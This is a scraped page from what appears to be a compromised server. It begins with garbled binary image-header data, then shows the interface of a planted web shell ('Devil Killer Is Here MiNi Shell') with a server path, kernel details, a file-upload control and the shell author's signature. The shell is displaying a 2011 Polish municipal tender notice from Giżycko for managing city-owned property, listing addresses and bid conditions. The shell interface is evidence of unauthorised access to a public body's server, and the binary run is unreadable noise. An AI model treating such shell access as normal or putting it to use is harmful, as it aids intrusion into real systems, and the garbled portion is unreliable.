JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110530/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110530/151105-N-2011.html

<p class="kh_header"><b>Giżycko: Zarządzanie gminnym zasobem nieruchomościami miasta Giżycka w okresie od 01.07.2011 r. do 30.06.2013 r</b><br>
<b>Numer ogłoszenia: 151105 - 2011; data zamieszczenia: 30.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Giżycko , al. 1 Maja 14/120, 11-500 Giżycko, woj. warmińsko-mazurskie, tel. 087 4282997, 4285231 w. 43, faks 087 4285241.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gizycko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zarządzanie gminnym zasobem nieruchomościami miasta Giżycka w okresie od 01.07.2011 r. do 30.06.2013 r.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Organizowanie oraz wykonywanie prac związanych z zarządzaniem  gminnym zasobem nieruchomości zgodnie z zasadami wynikającymi z przepisów prawa i standardami zawodowymi oraz zgodnie z etyką zawodową w odniesieniu do następujących nieruchomości:

Zakres 1: nieruchomości 100% komunalne:
Budynki mieszkalne i użytkowe (wraz z lokalami) oraz tereny posesji wraz  z istniejącą zabudową gospodarczą (składy, garaże), infrastrukturą techniczną, obiektami zieleni i małej architektury.   

Budynki 100% komunalne (dane na 30.04.2011r.)

1. al.1 Maja			( Kaplica Cmentarna )- sam budynek
2. Białostocka				15,37,37A
3. Bystry			(sam obiekt zaplecza budowy oczyszczalni ścieków)
4. Bystry 26A 				schronisko dla psów
5. Daszyńskiego				8,27A-jeden lokal użytkowy
6. Jeziorna					10
7. Konarskiego 	10,11,12,17,19, 19A,23A,23B,29
8. Kościuszki	2
9. Królowej Jadwigi                 18C - dziesięć mieszkań w bloku spółdzielczym
10. Łuczańska				2,7
11. Mickiewicza				37
12. Nowowiejska		1,29B-dziesięć mieszkań w bloku spółdzielczym
13. Olsztyńska				13A,
14. Plac Dworcowy		          budynek z szaletami
15. Plac Targowy 				1
16. Pionierska				16A,
17. Pocztowa 				3
18. Plac Grunwaldzki			5,
19. Sikorskiego 				3A
20. Suwalska				21,32
21. Smętka				12A,14
22. Warszawska	11A,,14,15B, 17A,19A,22A,26A
23. Wilanowska				2,4,6,8
24. Wodociągowa 				15,17

Zakres 2. Komunalne lokale mieszkalne i użytkowe w budynkach wspólnot mieszkaniowych wraz z przynależnymi piwnicami oraz tereny posesji  wraz  z istniejącą zabudową gospodarczą (składy, garaże), infrastrukturą techniczną, obiektami zieleni i małej architektury.
Zakres ten nie będzie obejmował zadań dotyczących zarządzania częściami wspólnymi w nieruchomościach wspólnot mieszkaniowych wynikających 
z przepisów ustawy z dnia 24 czerwca 1994r. o własności lokali.

Lokale komunalne - mieszkaniowe i użytkowe w budynkach wspólnot mieszkaniowych (dane na dzień 30.04.2011r.)				
								
Lp. Adres budynku	Numer lokalu
1. aleja 1 Maja 1	5,9
2. aleja 1 Maja 2A	21
3. aleja 1 Maja 4	10,11,13,32,34,39,43,46, jeden lok. użytkowy
4. Armii Krajowej 4A	8
5. Armii Krajowej 7	2,7,8,11
6. Armii Krajowej 8	7,8, jeden lokal użytkowy
7. Armii Krajowej 8A	2,3,5,8,10,12
8. Białostocka 6 	1,6
9. Białostocka 7	1,5,15
10. Białostocka 22	1a,2,4
11. Boh.Westerplatte 11	5,6
12. Daszyńskiego 5	4
13. Daszyńskiego 10	1,7,14
14. Daszyńskiego 10A	18,20
15. Daszyńskiego 10B	3,4,8,20
16. Daszyńskiego 12	1,15,17, jeden lokal użytkowy
17. Daszyńskiego 12A	4,9,10,17,18,19,20
18. Daszyńskiego 27	25,31,35,40
19. Dąbrowskiego 3	12, jeden lokal użyt.
20. Dąbrowskiego 4	1,1a,2,4,5,7,8,9,10,11, jeden lok.użyt
21. Dąbrowskiego 5	3,7,8,9
22. Dąbrowskiego 6	6,7,8,9,10,12,12a,12b,14,15,16,18,20,23
23. Dąbrowskiego 7	3,4,10,11,12,13
24. Dąbrowskiego 9	2
25. Dąbrowskiego 13	7,8,10
26. Dąbrowskiego17	5,8,13
27. Gdańska 11	Same lokale użytkowe (6 umów)
28. Gdańska 12	1,6
29. Gdańska 16	3
30. Jeziorna 5	4,7,8,11,12,12A
31. Jeziorna 5A	2
32. Jeziorna 5C	3
33. Kętrzyńskiego 1	34, jeden boks magazynowy
34. Kętrzyńskiego 1A	5,25,35
35. Kętrzyńskiego 2	5
36. Kętrzyńskiego 11	1,5
37. Kolejowa 4	2,5,7
38. Kolejowa 8	9
39. Kombatantów 7	8,9,12,16,20,24,25,26,36, trzy lokale użytkowe
40. Konarskiego 1	2,4,9
41. Konarskiego 7	10
42. Konarskiego 9	2,5
43. Konarskiego 16	13,19
44. Konarskiego 18	5
45. Konarskiego 20	1,2
46. Konarskiego 24	2,3
47. Konarskiego 31	1,3,5,6,7,8,9,11,12,13,15,16,17
48. Koszarowa 1	5,8
49. Koszarowa 4	7,15
50. Kościuszki 11	5
51. Królowej Jadwigi 21	1,6,12,18,20,22,23,28, 29,30
52. Mazurska 2	9
53. Mazurska 3	4,5
54. Mazurska 5	1,5,7,8,10,11,12
55. Mazurska 7	6
56. Mickiewicza 6	45,46
57. Mickiewicza 10 	 jedno pom. użyt.
58. Mickiewicza 12	1,2,3,5,7,8,9,10,11
59. Mickiewicza 16	2,6,7
60. Mickiewicza 20	3,4
61. Mickiewicza 29	2,3,4,4A
62. Mickiewicza 31	10,12,13,15, jeden lok. użyt.
63. Mickiewicza 31A	2
64. Mickiewicza 37A	jeden lok. użyt.
65. Mickiewicza 41	7,10,11,12
66. Nowowiejska 3	1,2,3,3a,4,5,5a,6
67. Nowowiejska 12	1,3,8,10,12
68. Nowowiejska 14	5,11,12
69. Nowowiejska 23	9
70. Nowowiejska 31	4
71. Nowowiejska 33	2,3,4,10,14,16
72. Olsztyńska 19	2
73. Osiedle XXX-lecia 5	9,27,38,41,43,50
74. Owsiana 6	4
75. Pionierska 1	2,3,7a,8
76. Pionierska 3	8, jeden lok. użyt.
77. Pionierska 7	6
78. Pionierska 8	2,6,16,18
79. Pionierska 9	13,14
80. Pionierska 18	1,3a,5,6
81. Plac Dworcowy 3	12,16
82. Plac Grunwaldzki 1	38,46,49,69,jeden lok. użytk.
83. Plac Targowy 3	3,5,6
84. Sikorskiego 3	12,12a,12b,21,26, jeden lok. użyt.
85. Sikorskiego 4	1,4,7,12,13,15
86. Sikorskiego 5	2,6,7A
87. Sikorskiego 6	1,7
88. Suwalska 9	3a,5,7,8,10
89. Suwalska 9B	1
90. Suwalska 14	3,10,22,24
91. Smętka 1	5,8,9,15,16
92. Smętka 6	1,5,7,8,10,12,17,18,25,41,42
93. Smętka 10	1,3,4,5,6,7,8,9,10
94. Smętka 11	6,18
95. Smętka 12	1,2,13,16,27,30,35,36,40
96. Staszica 2	1,2,3,4,4a,6,6a
97. Staszica 4	1,2,5,6,8,9
98. Traugutta 3	4
99. Traugutta 10	2,4,5,7
100. Traugutta 14	6,7,11,15,16
101. Traugutta 16	7,8,9,9a
102. 3 Maja 3	4
103. 3 Maja 4	10,13,15,17a,18,19, jeden lok. użyt.
104. 3 Maja 15	4,7,9,13,15
105. 3 Maja 28	2
106. 3 Maja 42	5,7
107. Warszawska 1	26
108. Warszawska 3	8
109. Warszawska 5	7,8,13,17,26,28,36,40,41
110. Warszawska 7	33, jeden lok. użyt.
111. Warszawska 11	4
112. Warszawska 12	1,2,3,4,5,6,7
113. Warszawska 15	6a,7,9
114. Warszawska 15A	3
115. Warszawska 16	2,8,9
116. Warszawska19	4,5
117. Warszawska 20	1,3,5,7,8
118. Warszawska 21	2,2a,9,10
119. Warszawska 22	3,6,7,9,10
120. Warszawska 24	1,5,6,7,8
121. Warszawska 26	1,5,7,9,13
122. Warszawska 29	1,3
123. Wyzwolenia 6	2,3,4,5,6,7,jeden lok. użyt.
124. Wyzwolenia 14	2,2a,3,5
			
Szczegółowe informacje dotyczące przedmiotu zamówienia określone są  w załącznikach:  nr 1 i nr 2 do specyfikacji.

Ogólna informacja o przedmiocie zamówienia na dzień 30.04.2011r.:
- łączna powierzchnia użytkowa wszystkich lokali Gminy Miejskiej Giżycko:  42 655,97m2 (w tym 720 mieszkań i 107 lokali użytkowych - łącznie z lokalami gospodarczymi) w tym:
18 301,91m2 - w budynkach komunalnych (282 mieszkań, 81 lokale użytkowe)
24 354,06m2 - w budynkach wspólnot mieszkaniowych (436 mieszkań,               26 lokali użytkowych)
- powierzchnia garaży : 1620,45m2 (100 garaży)
- powierzchnia składów : 3227,06m2 (347 składów)
- powierzchnia posesji przynależnych do zabudowanych nieruchomości: 
około 131 168m2

Uwaga: Przedmiot zamówienia, tj. ogólna powierzchnia użytkowa zasobów komunalnych, powierzchnia zabudowy gospodarczej, posesji może                    w okresie trwania umowy ulec zmniejszeniu  wskutek np. zbycia mienia miejskiego, rozbiórki, itp., wówczas zmianie ulegnie zakres zamówienia, a tym samym wynagrodzenie zostanie stosownie pomniejszone według obowiązującej jednostkowej stawki.
W przypadku zwiększenia przedmiotu umowy Zamawiający zastrzega prawo udzielenia zamówienia uzupełniającego zgodnie z art. 67 ust.1 pkt 6 - Prawa zamówień publicznych, wówczas zmianie ulegnie zakres zamówienia, a tym samym wynagrodzenie zostanie stosownie powiększone według obowiązującej jednostkowej stawki.
Informacja:
W 2009 roku powierzchnia stanowiąca podstawę naliczania wynagrodzenia uległa zmniejszeniu w sumie o ok. 1060m2 (w tym 1 lokal użytkowy ok. 15m2, pozostała część to 22 lokale mieszkalne) - sprzedaż
W 2010 roku powierzchnia stanowiąca podstawę naliczania wynagrodzenia uległa zmniejszeniu w sumie o ok. 1164m2 (w tym 24 lokale mieszkalne)- sprzedaż.
W 2011 roku do dnia 30 kwietnia powierzchnia stanowiąca podstawę naliczania wynagrodzenia uległa zmniejszeniu w sumie o ok. 578m2  (w tym 10 lokali mieszkalnych) - sprzedaż.

OKRES REALIZACJI ZAMÓWIENIA 
- od 1 lipca 2011 roku do 30 czerwca 2013 roku.
Zakres uprawnień i obowiązków Wykonawcy wynika z przepisów ustawy z dnia 21 sierpnia 1997r. o gospodarce nieruchomościami oraz umowy o zarządzanie nieruchomościami (projekt umowy w załączeniu do SIWZ)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Określenie przedmiotu  - j.w. 
W przypadku zwiększenia przedmiotu umowy Zamawiający zastrzega prawo udzielenia zamówienia uzupełniającego zgodnie z art. 67 ust.1 pkt 6 - Prawa zamówień publicznych, wówczas zmianie ulegnie zakres zamówienia, a tym samym wynagrodzenie zostanie stosownie powiększone według obowiązującej jednostkowej stawki.
Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających w wysokości nie więcej niż 25% wartości zamówienia podstawowego polegającego na powtórzeniu tego samego rodzaju zamówień.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 70.33.00.00-3, 70.30.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w przetargu jest wniesienie przed upływem terminu składania ofert wadium w wysokości: 9.000,00zł /dziewięć tysięcy złotych/
Wadium można wnieść w formie określonej w ustawie z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych art. 45 ust. pkt. 6 i 7, tj. w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,  
z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez  podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 Nr 42, poz. 275 z późniejszymi zmianami). 
Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego -  Bank Gospodarki Żywnościowej S.A. Nr konta bankowego: 77 2030 0045 1110 0000 0170 2330

Rozpatrywane będą tylko te oferty, na które zostanie wniesione  wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Wystarczającym pozostanie złożone oświadczenie o spełnieniu warunków udziału w postępowaniu 
z art. 22 ust. 1 upzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert przez minimum 
12 miesięcy zarządzał, a w przypadku świadczeń okresowych lub ciągłych zarządza, nieprzerwanie  nieruchomościami o łącznej powierzchni użytkowej nie mniejszej niż  9 000m2</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny. Wystarczającym pozostanie złożone oświadczenie o spełnieniu warunków udziału w postępowaniu 
z art. 22 ust. 1 upzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż dysponuje lub będzie dysponował co najmniej 
1 osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą licencję zarządcy nieruchomości nadaną na podstawie ustawy z dnia 27 sierpnia 1997r. o gospodarce nieruchomościami (Dz. U. z 2004r. Nr 261, poz. 2603 
z późn.zm.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 200. 000,00PLN (dwieście tysięcy złotych)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta złożona przez wykonawcę powinna być przygotowana w formie pisemnej wg poniższych warunków i  powinna zawierać następujące informacje:

1. Oferta cenowa powinna być przedstawiona zgodnie z  Formularzem Ofertowym (CZĘŚĆ H.);
2. Ceny powinny zawierać obowiązujący podatek VAT .
3. Dokumenty o których mowa w części E specyfikacji istotnych warunków zamówienia.
4. Załączyć :
- oświadczenie z ilu stron składa się oferta,
- dowód wniesienia wadium
- pełnomocnictwo do reprezentowania Wykonawcy (wykonawców występujących wspólnie), o ile ofertę składa pełnomocnik.
5. Wszystkie strony oferty powinny być ponumerowane, oraz  kopie dokumentów poświadczone za zgodność z oryginałem przez Wykonawcę.
6. Wszystkie przedkładane w ofercie dokumenty powinny być podpisane przez osobę upoważnioną do reprezentowania firmy zgodnie z formą reprezentacji Wykonawcy określoną w rejestrze handlowym lub innym dokumencie, właściwym dla formy organizacyjnej firmy Wykonawcy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy jest dopuszczalna w następujących sytuacjach:
- Ustawowej zmiany wysokości podatku VAT.
- Zmiany przepisów w oparciu, o które ustalono zakres obowiązków Wykonawcy, 
- Zmiany osobowej podwykonawców w przypadku gdy Wykonawca wykonuję umowę przy pomocy podwykonawców, w zakresie zgodnym z SIWZ.
- Zmiany osób wchodzących w skład licencjonowanych zarządców.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.gizycko. pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Mienia (pok. 213) Urzędu Miejskiego w Giżycku, al. 1 Maja 14, 
11-500 Giżycko.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2011 godzina 11:00, miejsce: Sekretariat (pok. 104) Urzędu Miejskiego w Giżycku, al. 1 Maja 14, 11-500 Giżycko.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com